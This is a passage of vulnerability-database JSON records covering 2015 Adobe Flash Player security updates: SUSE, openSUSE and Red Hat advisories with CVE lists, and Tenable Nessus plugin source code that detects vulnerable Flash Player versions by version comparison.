"edition": 1, "modified": "2015-04-16T00:04:48", "published": "2015-04-16T00:04:48", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00012.html", "id": "SUSE-SU-2015:0723-1", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:49", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2014-0581", "CVE-2014-0574", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2014-0576", "CVE-2015-0353", "CVE-2015-3041", "CVE-2014-0590", "CVE-2015-0350", "CVE-2014-8442", "CVE-2015-3040", "CVE-2014-0583", "CVE-2015-0349", "CVE-2014-0577", "CVE-2015-0352", "CVE-2014-0569", "CVE-2014-0589", "CVE-2014-0584", "CVE-2015-3044", "CVE-2015-0331", "CVE-2014-0558", "CVE-2014-0586", "CVE-2015-0347", "CVE-2015-0354", "CVE-2014-0573", "CVE-2014-0585", "CVE-2015-3039", "CVE-2014-8437", "CVE-2015-0360", "CVE-2014-0582", "CVE-2015-3038", "CVE-2015-0359", "CVE-2014-0588", "CVE-2015-0356", "CVE-2015-3043", "CVE-2014-8440", "CVE-2015-3042", "CVE-2014-8438", "CVE-2015-0332", "CVE-2014-0564", "CVE-2014-8441"], "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044)\n\n", "edition": 1, "modified": "2015-04-16T13:04:48", "published": "2015-04-16T13:04:48", "id": "OPENSUSE-SU-2015:0725-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00013.html", "type": "suse", "title": "Security update for Adobe Flash Player (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:46:24", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the Adobe Security Bulletin APSB15-09:\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\">https://helpx.adobe.com/security/products/flash-player/apsb15-09.html</a>\n\n", "edition": 1, "modified": "2015-05-16T00:05:04", "published": "2015-05-16T00:05:04", "id": "OPENSUSE-SU-2015:0890-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00010.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:09:51", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the Adobe Security Bulletin APSB15-09:\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\">https://helpx.adobe.com/security/products/flash-player/apsb15-09.html</a>\n\n", "edition": 1, "modified": "2015-05-14T20:04:55", "published": "2015-05-14T20:04:55", "id": "SUSE-SU-2015:0878-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00007.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:13:40", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the Adobe Security Bulletin APSB15-09:\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\">https://helpx.adobe.com/security/products/flash-player/apsb15-09.html</a>\n\n", "edition": 1, "modified": "2015-05-19T17:04:53", "published": "2015-05-19T17:04:53", "id": "OPENSUSE-SU-2015:0914-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00016.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:59", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0346", "CVE-2015-0347", "CVE-2015-0348", "CVE-2015-0349", "CVE-2015-0350", "CVE-2015-0351", "CVE-2015-0352", "CVE-2015-0353", "CVE-2015-0354", "CVE-2015-0355", "CVE-2015-0356", "CVE-2015-0357", "CVE-2015-0358", "CVE-2015-0359", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-3039", "CVE-2015-3040", "CVE-2015-3041", "CVE-2015-3042", "CVE-2015-3043", "CVE-2015-3044"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB15-06\nlisted in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use these flaws to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially, execute\narbitrary code when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2015-0346, CVE-2015-0347, CVE-2015-0348, CVE-2015-0349,\nCVE-2015-0350, CVE-2015-0351, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354,\nCVE-2015-0355, CVE-2015-0356, CVE-2015-0358, CVE-2015-0359, CVE-2015-0360,\nCVE-2015-3038, CVE-2015-3039, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043)\n\nA security bypass flaw was found in flash-plugin that could lead to the\ndisclosure of sensitive information. (CVE-2015-3044)\n\nTwo memory information leak flaws were found in flash-plugin that could\nallow an attacker to potentially bypass ASLR (Address Space Layout\nRandomization) protection, and make it easier to exploit other flaws.\n(CVE-2015-0357, CVE-2015-3040)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.457.\n", "modified": "2018-06-07T09:04:30", "published": "2015-04-15T04:00:00", "id": "RHSA-2015:0813", "href": "https://access.redhat.com/errata/RHSA-2015:0813", "type": "redhat", "title": "(RHSA-2015:0813) Critical: flash-plugin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:43:10", "description": "The remote Windows host is missing KB3049508. It is, therefore,\naffected by the following vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)", "edition": 28, "published": "2015-04-16T00:00:00", "title": "MS KB3049508: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB3049508.NASL", "href": "https://www.tenable.com/plugins/nessus/82823", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82823);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-0346\",\n \"CVE-2015-0347\",\n \"CVE-2015-0348\",\n \"CVE-2015-0349\",\n \"CVE-2015-0350\",\n \"CVE-2015-0351\",\n \"CVE-2015-0352\",\n \"CVE-2015-0353\",\n \"CVE-2015-0354\",\n \"CVE-2015-0355\",\n \"CVE-2015-0356\",\n \"CVE-2015-0357\",\n \"CVE-2015-0358\",\n \"CVE-2015-0359\",\n \"CVE-2015-0360\",\n \"CVE-2015-3038\",\n \"CVE-2015-3039\",\n \"CVE-2015-3040\",\n \"CVE-2015-3041\",\n \"CVE-2015-3042\",\n \"CVE-2015-3043\",\n \"CVE-2015-3044\"\n );\n script_bugtraq_id(\n 74062,\n 74064,\n 74065,\n 74066,\n 74067,\n 74068,\n 74069\n );\n script_xref(name:\"MSKB\", value:\"3049508\");\n\n script_name(english:\"MS KB3049508: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing KB3049508. It is, therefore,\naffected by the following vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/3049508/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB3049508.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player domainMemory ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# < 17.0.0.169\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 17 ||\n (\n iver[0] == 17 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] < 169)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 17.0.0.169' +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T02:34:22", "description": "The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 17.0.0.134. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)", "edition": 25, "published": "2015-04-14T00:00:00", "title": "Adobe Flash Player <= 17.0.0.134 Multiple Vulnerabilities (APSB15-06)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB15-06.NASL", "href": "https://www.tenable.com/plugins/nessus/82781", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82781);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-0346\",\n \"CVE-2015-0347\",\n \"CVE-2015-0348\",\n \"CVE-2015-0349\",\n \"CVE-2015-0350\",\n \"CVE-2015-0351\",\n \"CVE-2015-0352\",\n \"CVE-2015-0353\",\n \"CVE-2015-0354\",\n \"CVE-2015-0355\",\n \"CVE-2015-0356\",\n \"CVE-2015-0357\",\n \"CVE-2015-0358\",\n \"CVE-2015-0359\",\n \"CVE-2015-0360\",\n \"CVE-2015-3038\",\n \"CVE-2015-3039\",\n \"CVE-2015-3040\",\n \"CVE-2015-3041\",\n \"CVE-2015-3042\",\n \"CVE-2015-3043\",\n \"CVE-2015-3044\"\n );\n script_bugtraq_id(\n 74062,\n 74064,\n 74065,\n 74066,\n 74067,\n 74068,\n 74069\n );\n\n script_name(english:\"Adobe Flash Player <= 17.0.0.134 Multiple Vulnerabilities (APSB15-06)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 17.0.0.134. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 17.0.0.169 or later.\n\nAlternatively, Adobe has made version 13.0.0.281 and 11.2.202.457\navailable for those installations that cannot be upgraded to 17.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player domainMemory ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n \n if(isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if(isnull(ver))\n continue;\n\n vuln = FALSE;\n\n # Chrome Flash <= 17.0.0.134\n if(variant == \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"17.0.0.134\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # <= 13.0.0.277\n if(variant != \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"13.0.0.277\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # 14-17 <= 17.0.0.134\n if(variant != \"Chrome_Pepper\" &&\n ver =~ \"^1[4567]\\.\" &&\n ver_compare(ver:ver,fix:\"17.0.0.134\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n if(vuln)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"17.0.0.169 / 13.0.0.281\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"17.0.0.169 / 13.0.0.281\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n if(variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome after version 21\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 17.0.0.169 (Chrome PepperFlash)';\n else if(!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:41:08", "description": "Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player for\nWindows, Macintosh and Linux. These updates address vulnerabilities\nthat could potentially allow an attacker to take control of the\naffected system. Adobe is aware of a report that an exploit for\nCVE-2015-3043 exists in the wild, and recommends users update their\nproduct installations to the latest versions.\n\n- These updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\nCVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360,\nCVE-2015-3038, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\n- These updates resolve a type confusion vulnerability that could lead\nto code execution (CVE-2015-0356).\n\n- These updates resolve a buffer overflow vulnerability that could\nlead to code execution (CVE-2015-0348).\n\n- These updates resolve use-after-free vulnerabilities that could lead\nto code execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\nCVE-2015-3039).\n\n- These updates resolve double-free vulnerabilities that could lead to\ncode execution (CVE-2015-0346, CVE-2015-0359).\n\n- These updates resolve memory leak vulnerabilities that could be used\nto bypass ASLR (CVE-2015-0357, 